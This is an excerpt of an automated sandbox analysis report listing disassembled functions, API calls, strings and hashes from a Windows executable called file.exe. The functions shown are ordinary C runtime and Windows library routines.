Opcode Fuzzy Hash: 340212e5769ce11c4ca132c247af826724228569a08e38620ff75d7b1cbfd6ac
Instruction Fuzzy Hash: 02517FB1D042489BDB10DFE5D98579EBBB8AF14304F14413AEC08BB3C1E779A904C79A

Function 00407909 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00407952
__alloca_probe_16.LIBCMT ref: 0040797E
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 004079BD
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004079DA
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00407A19
__alloca_probe_16.LIBCMT ref: 00407A36
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407A78
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00407A9B

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: d0a7f92577884bf1c4c44c1b70a1bb225ce45aa8c03b6a7059db006b11169587
Instruction ID: 31d26c36776ad43a2bcc41cc88f3e860eb4c410fbd45bd8719c31fedd31832b1
Opcode Fuzzy Hash: d0a7f92577884bf1c4c44c1b70a1bb225ce45aa8c03b6a7059db006b11169587
Instruction Fuzzy Hash: 0851A472E04206AFEF209F94CC45FAF3BA9EF44754F15403AB904B62D1D778AD118B99

Function 005F7FFB Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0042B3A4,00000FA0,?,?,005F7FD9), ref: 005F8007
GetModuleHandleW.KERNEL32(0041DFE0,?,?,005F7FD9), ref: 005F8012
GetModuleHandleW.KERNEL32(0041E024,?,?,005F7FD9), ref: 005F8023
GetProcAddress.KERNEL32(00000000,0041E040), ref: 005F8035
GetProcAddress.KERNEL32(00000000,0041E05C), ref: 005F8043
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,005F7FD9), ref: 005F8066
RtlDeleteCriticalSection.NTDLL(0042B3A4), ref: 005F8082
CloseHandle.KERNEL32(0042B3A0,?,?,005F7FD9), ref: 005F8092

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID:
API String ID: 2565136772-0
Opcode ID: 3afd87156110544aab6276892685be635895f3eea0f680a35fae2ea3849afc99
Instruction ID: a0e5e0973f6cdc5c029b5d94407e3c497e1a2ba6fb36f3e830219838202b427b
Opcode Fuzzy Hash: 3afd87156110544aab6276892685be635895f3eea0f680a35fae2ea3849afc99
Instruction Fuzzy Hash: B30192B1B40625AFD7309B71AC0CBB63F98FB48744B554022FE09D6250DFBCC8068669

Function 00405220 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00403190: ___std_exception_copy.LIBVCRUNTIME ref: 0040321F

std::locale::_Init.LIBCPMT ref: 0040532E

Part of subcall function 00407286: __EH_prolog3.LIBCMT ref: 0040728D
Part of subcall function 00407286: std::_Lockit::_Lockit.LIBCPMT ref: 00407298
Part of subcall function 00407286: std::locale::_Setgloballocale.LIBCPMT ref: 004072B3
Part of subcall function 00407286: _Yarn.LIBCPMT ref: 004072C9
Part of subcall function 00407286: std::_Lockit::~_Lockit.LIBCPMT ref: 00407309

Part of subcall function 00405BE0: std::_Lockit::_Lockit.LIBCPMT ref: 00405C16
Part of subcall function 00405BE0: std::_Lockit::_Lockit.LIBCPMT ref: 00405C39
Part of subcall function 00405BE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00405C59
Part of subcall function 00405BE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00405CD3

std::locale::_Init.LIBCPMT ref: 004053F1
Concurrency::cancel_current_task.LIBCPMT ref: 00405508
Concurrency::cancel_current_task.LIBCPMT ref: 0040550D

Part of subcall function 00401660: ___std_exception_copy.LIBVCRUNTIME ref: 0040169E

Strings

PY@, xrefs: 004053D4
Y@, xrefs: 00405463

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_std::locale::_$Concurrency::cancel_current_taskInit___std_exception_copy$H_prolog3SetgloballocaleYarn
String ID: Y@$PY@
API String ID: 591049177-2146064064
Opcode ID: e7680346b6c9082c1c0addee870658089d3d88bc9b56bffd1a77ea8c0fea5607
Instruction ID: 697e1ab91c4645f2e97e99acafd4e88e70a8d06cadb45b74a81389531607e098
Opcode Fuzzy Hash: e7680346b6c9082c1c0addee870658089d3d88bc9b56bffd1a77ea8c0fea5607
Instruction Fuzzy Hash: CAA147B0A00605DFDB00CF55C594B9ABBF0FF09314F1581AAE809AF792D7B9A984CF95

Function 0040A860 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040A897
___except_validate_context_record.LIBVCRUNTIME ref: 0040A89F
_ValidateLocalCookies.LIBCMT ref: 0040A928
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A953
_ValidateLocalCookies.LIBCMT ref: 0040A9A8

Strings

csm, xrefs: 0040A93D

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 8f8e251228443eed14cd416bef5f8e2c82130d9abc7c1c57839264c89e9358e2
Instruction ID: 61c584224504fc4a6476a6c0733857a102cea59a13872f0245e0cb70a6d3b7aa
Opcode Fuzzy Hash: 8f8e251228443eed14cd416bef5f8e2c82130d9abc7c1c57839264c89e9358e2
Instruction Fuzzy Hash: FE41C674E003189BCF10DF69C845A9E7BB5EF44318F14806AE8146B3D2C739AA65CBDA

Function 00605CEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\file.exe, xrefs: 00605CF1
?^`, xrefs: 00605D3D

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ?^`$C:\Users\user\Desktop\file.exe
API String ID: 0-1749336365
Opcode ID: d981e5793ca8b2ffb131b2adb0f7f667184dc6da33eef07ed5dc674e2a7489c4
Instruction ID: 1191d734a4f69571de9f50e620a2c04484f3e52a1a29a5dd4ed501790dfab4cb
Opcode Fuzzy Hash: d981e5793ca8b2ffb131b2adb0f7f667184dc6da33eef07ed5dc674e2a7489c4
Instruction Fuzzy Hash: 5421297164060E7FDB246F65CC489BB7B6EEF813647104526F516972D0E730EC019BA4

Function 004112DB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 00411346
api-ms-, xrefs: 00411332

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 129cbb2c69f00aee2ade31a09bffe59ed12de1c91300b81d07dce6b1e3195e12
Instruction ID: 524f7e3519d1b7c9315bbabfed10f22f2aff3c8e3e1bdf1d23efb63e8076ebb2
Opcode Fuzzy Hash: 129cbb2c69f00aee2ade31a09bffe59ed12de1c91300b81d07dce6b1e3195e12
Instruction Fuzzy Hash: 88213871A41629B7EB314B249C40BDB3758AF017A0F200222EE22A77F4E738DD81C5E9

Function 0041776F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004174BB: _free.LIBCMT ref: 004174E0

_free.LIBCMT ref: 004177BD

Part of subcall function 004110CB: RtlFreeHeap.NTDLL(00000000,00000000,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?), ref: 004110E1
Part of subcall function 004110CB: GetLastError.KERNEL32(?,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?,?), ref: 004110F3

_free.LIBCMT ref: 004177C8
_free.LIBCMT ref: 004177D3
_free.LIBCMT ref: 00417827
_free.LIBCMT ref: 00417832
_free.LIBCMT ref: 0041783D
_free.LIBCMT ref: 00417848

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2068531cc5736b876e777bdd4f0c55c5d811557a2b6055c8f43dc6ea2966efd3
Instruction ID: 8012668aba4bc5979675220d70d02a4040b1c55b3942d783b2051b1edc79670f
Opcode Fuzzy Hash: 2068531cc5736b876e777bdd4f0c55c5d811557a2b6055c8f43dc6ea2966efd3
Instruction Fuzzy Hash: 8C112C71945B44AAD530F7B2CC06FCB7BBC5F08704F80481EB299674A2DA6DA9849A68

Function 006079D6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00607722: _free.LIBCMT ref: 00607747

_free.LIBCMT ref: 00607A24

Part of subcall function 00601332: HeapFree.KERNEL32(00000000,00000000,?,0060774C,?,00000000,?,?,?,006079EF,?,00000007,?,?,00607EE2,?), ref: 00601348
Part of subcall function 00601332: GetLastError.KERNEL32(?,?,0060774C,?,00000000,?,?,?,006079EF,?,00000007,?,?,00607EE2,?,?), ref: 0060135A

_free.LIBCMT ref: 00607A2F
_free.LIBCMT ref: 00607A3A
_free.LIBCMT ref: 00607A8E
_free.LIBCMT ref: 00607A99
_free.LIBCMT ref: 00607AA4
_free.LIBCMT ref: 00607AAF

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 61036d7aeaef37f1c680bc47d5045128d619a2fd0ad25181c7ff71de37bec48b
Instruction ID: f8a52d096329ed1ea1154240ba6666c611958f90fc6e275d5f3bd196f72bad67
Opcode Fuzzy Hash: 61036d7aeaef37f1c680bc47d5045128d619a2fd0ad25181c7ff71de37bec48b
Instruction Fuzzy Hash: B41172319C5704AAD568FB70CC47FCB779EAF05780F804C1DB2AA6A0D3D664F9064758

Function 00403190 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0040321F

Part of subcall function 004090D0: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,004010DD,?,00407035,?,00428ED8,?,?,?,?,004010DD,0042BBA0,0042BBA1), ref: 00409130

Strings

*@, xrefs: 00403224
*@, xrefs: 00403168, 0040323B
ios_base::failbit set, xrefs: 004031CF
ios_base::badbit set, xrefs: 004031C5
ios_base::eofbit set, xrefs: 004031D4

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$*@$*@
API String ID: 3109751735-2605901389
Opcode ID: bf29012f8cde63b57bd84a2a75edb1ea270d9c4ca037db3c8200d458449cfc46
Instruction ID: 16396352a9ad20b890a3abde14abfac9595ddb60554ae8d7bb85e16e069d724b
Opcode Fuzzy Hash: bf29012f8cde63b57bd84a2a75edb1ea270d9c4ca037db3c8200d458449cfc46
Instruction Fuzzy Hash: D211E1B16043046BC700EF69D802B96B7ECAF44311F14C53FB918AB6C1EB78EA14CB99

Function 00419A40 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 00419A88
__fassign.LIBCMT ref: 00419C6D
__fassign.LIBCMT ref: 00419C8A
WriteFile.KERNEL32(?,00411A53,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00419CD2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00419D12
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00419DBA

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: b2177269e67daab435ca0c01aa84d7bc27420d7d907068bef7cc1e4ecfee8082
Instruction ID: 8bdf9ab0203fac8b3a1207d81c51f0783b1d7c4aa063ad8d91babdf0b66c9c5d
Opcode Fuzzy Hash: b2177269e67daab435ca0c01aa84d7bc27420d7d907068bef7cc1e4ecfee8082
Instruction Fuzzy Hash: B8C19E71D002589FCB14CFA9D8909EDBBB5FF09314F28416AE855B7341D634AE86CF68

Function 00609CA7 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 00609CEF
__fassign.LIBCMT ref: 00609ED4
__fassign.LIBCMT ref: 00609EF1
WriteFile.KERNEL32(?,00601CBA,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00609F39
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00609F79
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0060A021

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 89b514e143f947ee3c303f0677e8b0bc3cb38375d43ff316d4ddd512ec787ec1
Instruction ID: e4c04d3a93d88a029d016d033602452e8e44044c84b551d43252a7c1f61bf851
Opcode Fuzzy Hash: 89b514e143f947ee3c303f0677e8b0bc3cb38375d43ff316d4ddd512ec787ec1
Instruction Fuzzy Hash: 2FC16C71D4025D9FCB18CFE8C8849EEBBB6AF48314F28416AE855F7382D6319D46CB64

Function 005F7B70 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 005F7BB9
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 005F7C24
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005F7C41
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 005F7C80
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005F7CDF
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 005F7D02

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 3e88c3b581f8d23929991033493ddcb70d3b666889250b0ca2b5a92902153281
Instruction ID: 7f0fb55c7f42cc4f054fe712b8eb2fe0e8e1bea1900d2b9539d5b2fc63077724
Opcode Fuzzy Hash: 3e88c3b581f8d23929991033493ddcb70d3b666889250b0ca2b5a92902153281
Instruction Fuzzy Hash: A0518C72A0420EABEB215F60CC45FBA7FA9FF88750F254825FA15E7150E7789D11CB60

Function 00405BE0 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00405C16
std::_Lockit::_Lockit.LIBCPMT ref: 00405C39
std::_Lockit::~_Lockit.LIBCPMT ref: 00405C59
std::_Facet_Register.LIBCPMT ref: 00405CBB
std::_Lockit::~_Lockit.LIBCPMT ref: 00405CD3
Concurrency::cancel_current_task.LIBCPMT ref: 00405CF6

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 731d4f4dd5b887fbe31f6f79b730e442cca3bdcd2ab2d16f44c97515b484e5ff
Instruction ID: b8fff033ad68a4b49d69bc24182efec50e89eb1ddc6f025d6d5bcbadf0b3888f
Opcode Fuzzy Hash: 731d4f4dd5b887fbe31f6f79b730e442cca3bdcd2ab2d16f44c97515b484e5ff
Instruction Fuzzy Hash: 8431AC71A086598BDB20DF58C984AAFB7B0EB04324F51017EE805772D1D7386906CF9A

Function 005F5E47 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005F5E7D
std::_Lockit::_Lockit.LIBCPMT ref: 005F5EA0
std::_Lockit::~_Lockit.LIBCPMT ref: 005F5EC0
std::_Facet_Register.LIBCPMT ref: 005F5F22
std::_Lockit::~_Lockit.LIBCPMT ref: 005F5F3A
Concurrency::cancel_current_task.LIBCPMT ref: 005F5F5D

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 961804d6194318115971f84951117adb712614f77c7a51e804cf21ac45d2a300
Instruction ID: 7a9f5ffecf858f2b344c66e22663e3002f78460abb5dab8c27ea314a4dc3c26a
Opcode Fuzzy Hash: 961804d6194318115971f84951117adb712614f77c7a51e804cf21ac45d2a300
Instruction Fuzzy Hash: FB31C07190061EDBCB21DF54C844ABEBFB4FB48720F1141A9EB05A7291EB386E02CBD5

Function 0040AA24 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040AA1B,0040908F,004086C9), ref: 0040AA32
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040AA40
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040AA59
SetLastError.KERNEL32(00000000,0040AA1B,0040908F,004086C9), ref: 0040AAAB

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a9d0e734becf0ef50911556631e14f05d46381792f09ada4a374dbd0aeddace0
Instruction ID: 6d9b3dcbd9e5b59f4922e34a2f99f0d8d4053759768d51feac99152b6d3e7269
Opcode Fuzzy Hash: a9d0e734becf0ef50911556631e14f05d46381792f09ada4a374dbd0aeddace0
Instruction Fuzzy Hash: 4801B1323083115FE6342EB5AD85A572A84EB1577A720033FF910711E2EB3D4C22D98E

Function 005FAC8B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,005FAC82,005F92F6,005F8930), ref: 005FAC99
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005FACA7
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005FACC0
SetLastError.KERNEL32(00000000,005FAC82,005F92F6,005F8930), ref: 005FAD12

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a9d0e734becf0ef50911556631e14f05d46381792f09ada4a374dbd0aeddace0
Instruction ID: c5bbe748cd0248e8794db7888ca0a825139d2bc641d283e13f406a221e9127d0
Opcode Fuzzy Hash: a9d0e734becf0ef50911556631e14f05d46381792f09ada4a374dbd0aeddace0
Instruction Fuzzy Hash: 2801F57220922B9FB6242EB9BC899762E54FB413757204239F714921E2EF1D4C01515B

Function 00415A85 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\file.exe, xrefs: 00415A8A

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\file.exe
API String ID: 0-1957095476
Opcode ID: 7f7f3462537e971ce76854522380655e7add2651e43c34bc36142944cdff18d4
Instruction ID: a3637393369f119d875811b8448f9ab0845f3a58ac6b256579f368b1e84a4b91
Opcode Fuzzy Hash: 7f7f3462537e971ce76854522380655e7add2651e43c34bc36142944cdff18d4
Instruction Fuzzy Hash: AA21DA71A04505FFDB206FA1CCC1DEBB76CEF84368710462AF51597291E738EC818799

Function 0040BBF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,0040BCB8,?,?,0042B440,00000000,?,0040BDE3,00000004,InitializeCriticalSectionEx,0041EB20,InitializeCriticalSectionEx,00000000), ref: 0040BC87

Strings

api-ms-, xrefs: 0040BC47

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: da84090441890d50f9cbdf5a97449929467e511c8f269dd5155a12c56a084703
Instruction ID: f3d87962938840b58fd7173fd4630e98729141fbd4713e3bd6713dd9fe03636a
Opcode Fuzzy Hash: da84090441890d50f9cbdf5a97449929467e511c8f269dd5155a12c56a084703
Instruction Fuzzy Hash: 1211A771A44621B7EB215B689C45B9A3394EF06760F14013AED01FB3D0DB78ED0186ED

Function 0040C533 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040C528,?,?,0040C4F0,00000000,?,?), ref: 0040C548
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040C55B
FreeLibrary.KERNEL32(00000000,?,?,0040C528,?,?,0040C4F0,00000000,?,?), ref: 0040C57E

Strings

CorExitProcess, xrefs: 0040C553
mscoree.dll, xrefs: 0040C541

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bbbf51e1b09233c39d8671541389975c35389409bf2ae3c6d29d29acdd24c030
Instruction ID: d0fe3958c8663ddec7843cbba18d51bf543517c859e995c00530513df0da9c67
Opcode Fuzzy Hash: bbbf51e1b09233c39d8671541389975c35389409bf2ae3c6d29d29acdd24c030
Instruction Fuzzy Hash: 48F08235D40228FBDB119B61DD0ABDEBE65EB04755F104171E805B22A0DB789F40DB9C

Function 0040F850 Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00410BB0: GetLastError.KERNEL32(00401F35,?,00401F39,0040C2E1,?,00401F35,?,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410BB5
Part of subcall function 00410BB0: SetLastError.KERNEL32(00000000,00000008,000000FF,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410C53

_free.LIBCMT ref: 0040FB3B
_free.LIBCMT ref: 0040FB54
_free.LIBCMT ref: 0040FB92
_free.LIBCMT ref: 0040FB9B
_free.LIBCMT ref: 0040FBA7

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 7557f7e5a2fb41107aafa1ffd7f08678150887a8db84d10aca0d352cff952198
Instruction ID: 9bede0c599c576f9b2d2f082e8b6f72dec9c1f6e213a7715d2007ea861b74451
Opcode Fuzzy Hash: 7557f7e5a2fb41107aafa1ffd7f08678150887a8db84d10aca0d352cff952198
Instruction Fuzzy Hash: 55B15B75A016199BDB34DF18C884BAAB7B5FF48304F1045BEE809A7790E774AE94CF48

Function 005FFAB7 Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00600E17: GetLastError.KERNEL32(005F219C,?,005F21A0,005FC548,?,005F219C,?,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600E1C
Part of subcall function 00600E17: SetLastError.KERNEL32(00000000,0042A190,000000FF,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600EBA

_free.LIBCMT ref: 005FFDA2
_free.LIBCMT ref: 005FFDBB
_free.LIBCMT ref: 005FFDF9
_free.LIBCMT ref: 005FFE02
_free.LIBCMT ref: 005FFE0E

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 19093d08ba9a4a842509f0026c24c96a45d3f708367fd8ea7b891057277414f2
Instruction ID: 2177e9809ee5844f64a95b73d332cd8b9012e524efa9f347ac94ce5d98d00787
Opcode Fuzzy Hash: 19093d08ba9a4a842509f0026c24c96a45d3f708367fd8ea7b891057277414f2
Instruction Fuzzy Hash: B1B19C7590121ADFDB24DF18C888AAEBBB5FF48304F5045AEE909A7750D734AE90CF44

Function 0041A719 Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,0000000C,7FFFFFFF,?,?,0041A9D5,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0041A7BC
__alloca_probe_16.LIBCMT ref: 0041A872
__alloca_probe_16.LIBCMT ref: 0041A908
__freea.LIBCMT ref: 0041A973
__freea.LIBCMT ref: 0041A97F

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 0da7edde5c35575a4b97deaadd59934ba3a559d30e5c952f7f8a0f1f475a651b
Instruction ID: e305d7689c0d4ca039d266b8c45b8bf4b9bf31d96f7027a34176bdeb38f1a079
Opcode Fuzzy Hash: 0da7edde5c35575a4b97deaadd59934ba3a559d30e5c952f7f8a0f1f475a651b
